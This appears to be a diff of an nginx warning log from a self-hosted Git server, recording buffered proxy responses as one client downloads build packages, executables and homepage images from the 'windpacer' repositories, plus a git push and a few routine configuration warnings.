"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -2026/02/17 18:49:58 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/91/0000015919 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -2026/02/17 18:50:40 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/92/0000015920 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -2026/02/17 18:50:49 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/92/0000015921 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -2026/02/17 18:50:51 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/92/0000015922 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -2026/02/17 18:54:23 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/92/0000015923 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -2026/02/17 18:56:36 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/92/0000015924 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" -2026/02/17 18:56:45 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/92/0000015925 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" -2026/02/17 19:42:09 [warn] 931#931: *90771 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/92/0000015926 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -2026/02/17 19:49:46 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/92/0000015927 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -2026/02/17 19:50:23 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/92/0000015928 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -2026/02/17 19:51:27 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/92/0000015929 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -2026/02/17 19:51:30 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/93/0000015930 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -2026/02/17 19:51:32 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/93/0000015931 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -2026/02/17 19:51:42 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/93/0000015932 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -2026/02/17 19:52:53 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/93/0000015933 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -2026/02/17 19:52:59 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/93/0000015934 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -2026/02/18 03:30:53 [warn] 941#941: *93643 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr -2026/02/18 14:28:20 [warn] 961#961: *100638 a client request body is buffered to a temporary file /tmp/nginx/body/9/07/0000019079, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" -2026/02/18 20:55:11 [warn] 973#973: *100954 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr +2026/02/19 03:45:38 [warn] 992#992: *108189 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/19/0000022198 while reading upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /assets/css/index.css?v=1.25.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/assets/css/index.css?v=1.25.3", host: "git.hanmocnn.co.kr"